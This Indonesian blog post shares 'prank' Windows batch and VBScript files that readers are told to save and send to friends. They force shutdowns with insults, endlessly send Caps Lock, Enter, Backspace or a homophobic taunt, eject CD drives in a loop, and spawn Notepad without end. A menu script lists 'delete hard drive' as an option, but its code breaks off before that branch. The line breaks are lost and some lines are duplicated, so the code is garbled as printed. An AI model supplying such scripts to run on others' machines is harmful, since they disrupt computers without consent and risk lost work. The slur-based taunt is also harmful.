Script Untuk Jailin Komputer/Laptop Teman | Script Untuk Jailin Komputer/Laptop Teman | Script Untuk Jailin Komputer/Laptop Teman .
Untuk postingan saya kali ini saya mau share tentang Script Untuk Jailin Komputer/Laptop Teman ,. coba ajah gan pasti seru heeheh..
Nah berikut ini script yang saya dapat dari sumber..
Cekibrooott,,,
1). Memberi sedikit pesan dan shutdown komputer teman anda.
Ketik kode:
@echo offmsg * I don't like youshutdown -c "Error! You are too stupid!" -s
- Save As menggunakan Extension .BAT lalu kirim ke teman anda.
Contoh: apasaja.bat
Contoh: apasaja.bat
2). Menyalakan tombol Caps lock secara simultan.
Ketik kode:
Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{CAPSLOCK}"loop
- Save As .VBS terus kirim ke teman anda
Contoh: apasaja.VBS
Contoh: apasaja.VBS
3). Buka/tutup CD drive secara terus menerus.
Ketik kode:
Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop
- Save As .VBS terus kirim ke teman anda.
4). Yang ini script fungsinya supaya tekan enter secara simultan.
4). Yang ini script fungsinya supaya tekan enter secara simultan.
Ketik kode :
Set wshShell = wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "~(enter)"loop
- Save As .VBS terus kirim ke teman anda.
5). Script ini Fungsinya untuk membuka notepad, kemudian akan mengetik pesan kita secara otomatis di notepad.
5). Script ini Fungsinya untuk membuka notepad, kemudian akan mengetik pesan kita secara otomatis di notepad.
Ketik kode:
WScript.Sleep 180000WScript.Sleep 10000Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.Run "notepad"WScript.Sleep 100WshShell.AppActivate "Notepad"WScript.Sleep 500WshShell.SendKeys "Hel"WScript.Sleep 500WshShell.SendKeys "lo "WScript.Sleep 500WshShell.SendKeys ", ho"WScript.Sleep 500WshShell.SendKeys "w a"WScript.Sleep 500WshShell.SendKeys "re "WScript.Sleep 500WshShell.SendKeys "you"WScript.Sleep 500WshShell.SendKeys "? "WScript.Sleep 500WshShell.SendKeys "I a"WScript.Sleep 500WshShell.SendKeys "m g"WScript.Sleep 500WshShell.SendKeys "ood"WScript.Sleep 500WshShell.SendKeys " th"WScript.Sleep 500WshShell.SendKeys "ank"WScript.Sleep 500WshShell.SendKeys "s! "
- Save As .VBS terus kirim ke teman anda.
6). Membuat script VBS ini menjalankan BACKSPACE secara simultan.
6). Membuat script VBS ini menjalankan BACKSPACE secara simultan.
Ketik Code:
MsgBox "Let's go back a few steps"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop
- Save As .VBS terus kirim ke teman anda
7). Hack keyboard sehingga temen lu dipaksa ngetik " u are a gay" secara simultan.
7). Hack keyboard sehingga temen lu dipaksa ngetik " u are a gay" secara simultan.
Ketik kode:
Set wshShell = wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "You are a gay"loop
- Save As .VBS trus kirim ke teman anda
8). Buka Notepad secara terus menerus.
8). Buka Notepad secara terus menerus.
Ketik kode:
@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top
- Save As .BAT terus kirim ke teman anda
9). Script BAT yang ini bakal munculin 5 pilihan yang harus temen kalian diantaranya adalah:
9). Script BAT yang ini bakal munculin 5 pilihan yang harus temen kalian diantaranya adalah:
1. Shutdown2. Restart3. Hapus HardDrive4. Net Send5. Menampilkan pesan, kemudian shutdownKetik kode:@echo offtitle The end of the worldcd C:\:menuclsecho oops gw gak tanggung jawab lho apa yang barusan lu lakuin hehhe,,semuanya dh jadi tanggung jawab lu sendiri...pauseecho pilih nama cwe yang lu suka =P :echo 1. datanya bakal ilang lho.echo 2. komputer nya corrupt lhoecho 3. heheh no comment deh klo yang iniecho 4. mau mati pake jalan ini?echo 5. bye bye...set input=nothingset /p input=Choice:if %input%==1 goto oneif %input%==2 goto two
Itulah Script Untuk Jailin Komputer/Laptop Teman , semoga bermanfaat..
http://boriel-cyber.blogspot.com/2011/12/
kumpulan-script-kode-untuk-mengerjai.html
Tidak ada komentar:
Posting Komentar